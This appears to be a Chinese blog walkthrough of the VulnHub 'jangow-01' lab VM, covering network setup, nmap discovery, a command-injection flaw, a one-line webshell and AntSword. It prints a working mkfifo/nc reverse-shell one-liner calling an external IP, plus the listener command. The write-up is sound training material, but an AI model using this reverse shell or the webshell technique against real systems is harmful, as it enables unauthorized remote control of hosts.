当前位置: 首页 > news >正文

vuhub jangow-01-1.0.1靶场攻略

靶场下载

下载地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova

靶场使用

配置网卡:

一开始扫描不到这个靶机,但是我确定虚拟机网络连接方式都没有问题,那么应该是靶机没连上网,上网搜了搜是网卡配置的不对。那我们先配置一下网卡:

重启虚拟机,在出现这个界面的时候赶紧操作。我们要配置*0p??es avan?adas para buntu,但是这个界面很短,我试了好几次只能是在进入这个页面后赶紧点e,进入Ubuntu,然后再点shift退出向下选择*0p??es avan?adas para buntu,再点e进入编辑。

 在编辑页面找到如下内容,把ro替换成rw signie init=/bin/bash

然后按ctrl+x,进入如下页面

输入命令:vi /etc/network/interfaces

按i进入编辑模式,把网卡改成ens33

按?wq保存退出

然后重启虚拟机就可以了。

扫描端口:

这时候靶场已经启动了,咱们现在要找到这个靶场。

靶场是网页形式的,我们要找他,首先需要找到靶场的IP地址已经开发的端口才能访问:

怎么找呢?我们看他的网段,查看该虚拟机的网络连接形式,右键左侧虚拟机名字,点设置,点网络适配器:

看出是nat模式。我们再点上方编辑,虚拟网络编辑器,nat模式

看到子网为192.168.163.1-192.168.163.255

我们用Nmap工具扫描一下这个网段:命令:nmap 192.168.163.1/24:

找到靶场地址为192.168.163.142

浏览器访问一下:

点一下site

靶场攻略

点右上角buscar进入如下页面

可以看到url里有参数,那么他可能存在的漏洞有sql注入、ssrf、文件包含、命令执行...

这里是命令执行漏洞:

输入ifconfig,显示:

那我们试着把一句话木马写进去

访问1.php

那蚁剑试着连一下

在蚁剑里输入rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 59.110.83.22 443 >/tmp/f 

在服务器上开启监听nc -lvnp 443

得到反弹shell

http://www.dtcms.com/a/300595.html

相关文章:

  • 最优估计准则与方法(6)递推最小二乘估计(RLS)_学习笔记
  • 阻止网页重定向
  • 昇思学习营-【模型推理和性能优化】学习心得_20250730
  • 【QT入门到晋级】window opencv安装及引入qtcreator(包含两种qt编译器:MSVC和MinGW)
  • 系统整理Python的循环语句和常用方法
  • RabbiteMQ安装-ubuntu
  • XSS利用
  • 适配IE11(通过Babel+core-js转译ES6语法)
  • 神经网络模型训练需要的内存大小计算方法
  • 智能化设备健康管理:中讯烛龙预测性维护系统引领行业变革
  • 数学建模——模糊综合评价
  • 如何在 Ubuntu 24.04 或 22.04 中更改 SSH 端口
  • 一分钟部署一个导航网站
  • QTableView 使用实例(1)
  • Cursor下利用Stagewise实现 “所见即改” 的前端开发体验~
  • Java全栈面试实战:从JVM到AI的技术演进之路
  • 数据结构--优先级队列(堆)
  • 【网络协议安全】任务15:DHCP与FTP服务全配置
  • 点击劫持:潜藏在指尖的安全陷阱
  • Python异步下载实战:asyncio + aiohttp 性能碾压同步请求
  • 算法竞赛阶段二-数据结构(37)数据结构循环链表模拟实现
  • ios UIAppearance 协议
  • CodeBLEU:面向代码合成的多维度自动评估指标——原理、演进与开源实践
  • 笔记本键盘的启用和禁用
  • Python Pandas.cut函数解析与实战教程
  • ASP.NET Core 高并发万字攻防战:架构设计、性能优化与生产实践
  • 「mysql」Mac osx彻底删除mysql
  • 21.OSPF路由协议·多区域
  • 通过v4l2,采集视频,FFmpeg编码压缩封装视频(三)
  • 【模电笔记】—— 波形发生电路(波形振荡器)